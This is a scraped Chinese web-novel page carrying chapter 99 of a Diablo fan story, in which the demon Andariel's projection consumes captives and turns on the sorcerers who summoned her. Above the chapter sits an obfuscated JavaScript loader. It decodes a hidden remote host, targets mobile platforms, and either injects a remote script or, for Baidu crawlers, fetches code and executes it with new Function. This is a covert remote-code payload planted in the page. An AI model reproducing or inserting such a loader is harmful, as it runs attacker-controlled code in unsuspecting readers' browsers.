98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuaHN2Y2huc3ZuY3Z2ZC5jb20=','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

第99章 第九十九 被耍了(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

安达利尔伸出一只和蹄足长了同样红色鳞片的手,用利爪拨弄了一下送到眼前的两根断骨,然后一手扯下。

另一只手在自己的肋下划出一道伤口,将那两根断骨塞了进去,随着一阵骨骼爆响声,伤口渐渐愈合。

众人看着安达利尔伤口留下的恶魔之血,眼神显得有些炽热。

而融合了两块断骨的安达利尔,散发出的压迫感正在节节攀升。裸露的古铜色皮肤下,渐渐泛起一层乌黑,使她的肤色变得深沉了许多,连四肢的红色鳞片都变像是由黑铁铸造的一般。

“还有呢?”一个不辨男女的声音自其口中发出。

后面的三人闻言,当即将丢在身旁的人形物体提了起来,拖到安达利尔身前。

那三个人形物体竟然真的是人类,被布袋套着,并捆缚得结结实实,此时已经几乎没了动静。

看见那三个被送到近前的人类,安达利尔就宛如一头被投喂了血食的野兽,踏前一步,身后的四根蝎尾勾爪齐出,和两只利爪一起疯狂撕扯,一阵令人胆寒的撕扯声之后,地上就只剩下一堆正在毒液腐蚀下迅速消融的血肉。

环顾着依然一片死寂的寝殿,嗜血的眼神渐渐平息,取而代之的是一种冰冷的愤怒,在恶魔之瞳内隐隐闪动。

“他们是特兰维坎?”痛苦女王充满磁性的声音显得很平静,却让在场众人的心跳骤然加快。

每一个人都知道,事情好像脱离了预期。

“是的。他们一直都是以坎都拉斯王族后裔自称。。”站在安达利尔面前的野蛮人喉结滚动,一颗汗珠顺着喉结滚落进领口之中,努力使自己的声音显得平稳。

“他们说是,那就是了?”安达利尔突然笑了起来,众人却感觉冲击心神的那股痛苦情绪,逐渐变得暴怒。

众人心中都是一通卧槽,自己这特么的是遇上诈骗团伙了?这真是被坑得话都说不出来!

人都死了,你还能拿他们怎么样。。

罗格营地之中的人若是看到这一幕,大概会觉得这是本年度的最大惊喜了。

以前大家都是看破不说破,静静地看着那帮“王族后裔”拿腔拿调地装逼,虽然觉得跟那些人计较就是把自己也当白痴,但心里也着实厌烦得不行。

结果这帮家伙去了鲁高因,居然用这一套把巫师会和安达利尔一起耍了。

简直就是内服有毒,外用有奇效啊!

“不管如何,我们已经将交易的东西带来,兑现你的承诺!”站在后方的几个巫师会成员缓缓抽出了武器,语带威胁。

“不,交易还没有结束,你们,也是这次交易的一部分。”安达利尔身后四根蝎尾勾爪如同在伸懒腰一般,完全伸展开来,发出一阵筋膜拉伸的咯吱声。

“不过是个投影罢了!还以为你的本体在这里吗?干掉它!我们自己挖心取血!”那个野蛮人趁机退到队友身边,抄起双手阔斧。

“哦?你们,是不是忘了什么事?”

安达利尔怒火燃烧的眼中露出一抹不屑,双臂与身后四只蝎尾伸展开来,气势瞬间暴涨,随即蹄足重踏地面。

尽管只是投影,却让面前八人出现一阵魔王一怒,伏尸百万的末日幻象。

涌动的绿雾突然将厚重的寝殿大门轰然闭合,而几个剑拔弩张的巫师会成员的面部都开始变得扭曲,后颈部位的巨大痛处几乎要将他们的灵魂撕裂。

安达利尔的红发舞动得愈加狂烈,冷笑出声。

“怪不得会派你们来,一群不受控制,只求利益的渣滓,倒也合适。不能唤醒黑狂君李奥瑞克,让我这具投影增长一些实力,应该也差不多了。”

莫北三人刚沿着阶梯进入地下墓穴第四层,就听到大门关闭发出的巨响,立即沿着通道来到大寝殿外。

此时寝殿内不断传出凄厉的惨叫声,剧毒的雾气透过大门的缝隙不断向外喷涌,而整个地下墓穴似乎都在微微颤抖。

意识之中的侵蚀越来越强烈,寝殿之中散发出的威压也不断提升,三人此时的感觉,就像在往漆黑的深海中下沉一般。

联系此刻的情形,莫北三人终于大致猜到那些巫师会成员的目的。

“妈的。。这帮杂碎居然献祭自己!”

他这倒是冤枉那些家伙了,他们自己也没料到会被那个坑逼组织半卖半送了啊。

感觉安达利尔的气势不断攀升,莫北再不迟疑,一振手中兵刃,跃身而出。一脚踹在那两扇大门之上,厚重的大门应声被踹开一道刚好能容踢人通过的缝隙。

一道闪电标枪和一团几乎要挣脱束缚的狂暴火球,破开激流般喷涌而出毒雾,轰向黑暗中的恶魔双瞳。

莫北踏着地上的腐蚀殆尽的尸骨,对着那个散发惊人气势的高大身影发动了冲锋。

格瑞斯瓦尔德的锋锐斩在一只覆满黑色鳞甲的手臂,带起的风压鼓荡得火星漫卷,势大力沉的一剑却只在那手臂上斩出一道灼热的剑痕。

飞身劈出一记重斩的莫北还未落地,盾牌重击拍开横扫而来的利爪,四个蝎尾勾爪就直冲面门而来。

热诚!

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间